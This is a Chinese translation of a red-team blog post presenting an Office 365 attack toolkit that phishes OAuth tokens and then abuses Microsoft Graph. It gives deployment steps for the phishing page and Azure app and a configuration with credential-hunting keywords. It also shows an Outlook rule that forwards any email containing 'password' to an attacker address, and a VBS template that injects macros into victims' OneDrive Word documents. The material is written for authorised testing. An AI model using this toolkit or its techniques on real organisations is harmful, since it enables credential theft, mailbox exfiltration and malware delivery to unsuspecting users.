在紅隊參與期間，我們經常會與使用Office 365的組織進行聯繫。而當前針對這種環境的工具十分有限，這意味着我們可能需要在參與期間進行開發。爲了更好地爲這些環境做好準備，我們開發了一個專門針對Office 365的工具包。

本文我們將探討如何在Office 365大量使用的環境中，通過利用這些功能來幫助我們的紅隊參與。

概要

簡而言之，我們的工具包允許執行身份驗證令牌釣魚，以提取你可能感興趣的特定信息。這項技術本身並不新鮮，像Fancy Bear (APT28) 這樣的組織，就在 過去針對谷歌的活動 中使用過OAuth釣魚。

當前版本工具包的特性如下：

提取與特定關鍵字匹配的電子郵件

創建惡意Outlook規則

從OneDrive/Sharepoint中提取文件

對存儲的word文檔的宏注入

在深入瞭解如何使用此工具包之前，讓我們先簡要介紹一下主要組件：

釣魚端點（Phishing Endpoint ）- 此端點負責提供執行令牌釣魚的HTML文件。

後端服務（Backend Service）- 此服務將使用“盜取”令牌並執行定義的攻擊。

管理界面（Management Interface ）- 管理界面可用於檢查提取的信息。

建議按照如下方式部署此工具包：

部署

爲了突出本文的重點，我們將不會詳細介紹有關如何編譯，基礎架構如何設置等問題。我們假設已安裝了所有依賴，並已設置HTTPS redirector；我們將只關注與工具包相關的配置。

首先，我們需要更新配置以符合我們的需求。你可在template.conf進行配置。

示例配置如下：

[server]
 host = 127.0.0.1 ; The IP address for the external listener.
 externalport = 30662 ; Port for the external listener
 certificate = server.crt ; Certificate for the external listener
 key = server.key ; Key for the external listener
 internalport = 8080 ; Port for the internal listener.
 ; Keywords used for extracting emails and files of a user.
 [keywords]
 outlook = pass,vpn,creds,credentials,new
 onedrive = password,.config,.xml,db,database,mbd 
 [backdoor]
 enabled = true ; Enable/Disable this feature
 macro = "C:\Test.bas" ; The location of the macro file to use for backdooring documents

根據需要配置你的工具包後，需要在Azure門戶上創建一個應用。轉到Azure Active Directory -> App Registrations -> Register an application：

註冊應用後，你需要複製應用ID並使用你的應用程序ID更改static/index.html。

此外，應將連接到釣魚端點的HTTPS redirector URL作爲此Azure應用上的重定向URL添加。

要添加重定向URL，請導航到該應用程序，然後單擊添加重定向URL即可。

例如，這裏我的URL爲： https://myphishingurl.com/

由於釣魚端點是單頁面應用程序，因此你需要在高級設置（Advanced settings）上啓用隱式授權流程（ implicit grant flow）。

網絡釣魚登錄頁用於演示目的，你也可以在static/index.html上更改你的登錄頁面外觀。

特性

以下是工具包初始版本中當前實現的所有功能的簡要說明。

基於關鍵字的 Outlook Email 提取

此工具包可以使用關鍵字提取用戶的電子郵件。對於配置文件中定義的每個關鍵字，將下載所有與之匹配的電子郵件並將其存儲在數據庫中。這些電子郵件可以由之後由操作人員檢查。

Outlook 規則創建

Microsoft Graph API支持創建Outlook規則。你可以通過將規則JSON文件放置在rules/文件夾中來定義不同的規則。

有關如何創建規則的更多信息，請參閱MSDN文檔。

出於演示目的，以下是一個規則的示例。在加載時，會將主體包含“password”關鍵字的每封電子郵件轉發到[email protected]：

{      
     "displayName": "Example Rule",      
     "sequence": 2,      
     "isEnabled": true,          
     "conditions": {
         "bodyContains": [
           "password"       
         ]
      },
      "actions": {
         "forwardTo": [
           {
              "emailAddress": {
                 "name": "Attacker Email",
                 "address": "[email protected]"
               }
            }
         ],
         "stopProcessingRules": false
      }    
 }

基於關鍵字的 OneDrive/Sharepoint 文件提取

Microsoft Graph API可用於訪問OneDrive，OneDrive for Business和SharePoint文檔庫中的文件。此工具包可以使用關鍵字提取用戶文件。對於配置文件中的每個已定義關鍵字，將下載並保存與其匹配的所有文檔。然後，操作人員可以使用管理界面檢查文檔。

Word 文檔宏感染

在OneDrive上託管的用戶文檔可以通過注入宏來後門。如果啓用此功能，用戶訪問的最後15個文檔將被下載，並使用配置文件中定義的宏進行後門操作。上傳後門文件後，文檔的擴展名將被更改爲.doc，以在Word上支持宏。應該注意的是，在對文檔進行後門操作之後，它們不能在線編輯，這增加了我們執行payload的機會。

此功能只能在Windows上使用，因爲宏的插入是使用Word COM對象完成的。VBS文件由下面的模板構建並執行，因此如果你看到wscript.exe正在運行，請不要慌張。

Dim wdApp
 Set wdApp = CreateObject("Word.Application")
 wdApp.Documents.Open("{DOCUMENT}")
 wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "{MACRO}"
 wdApp.Documents(1).SaveAs2 "{OUTPUT}", 0

Demo

讓我們來看一個簡單的演示：

安全考慮

除了工具所具有的功能外，它還會在運行的主機上打開一些攻擊面。首先，宏感染功能將打開word文件，如果你運行的是未修補的Office版本，可能會增加你的安全風險。此外，提取文件有可能下載到一些惡意文件，這些文件將被保存在你的電腦上。

OpSec方法可能包括正確隔離你的基礎架構，並且只允許與HTTPS redirector和Microsoft Graph API進行通信。

這篇文章由 Rio Sherri 撰寫，工具包可以從 MDSec Activebreach Github進行下載 。

注：在完成這項研究後，我們發現FireEye創建的現有工具包（ PwnAuth ）也採用了類似的方法，因此也應得到大家的認可。

*參考來源： mdsec ，FB小編secist編譯，轉載請註明來自FreeBuf.COM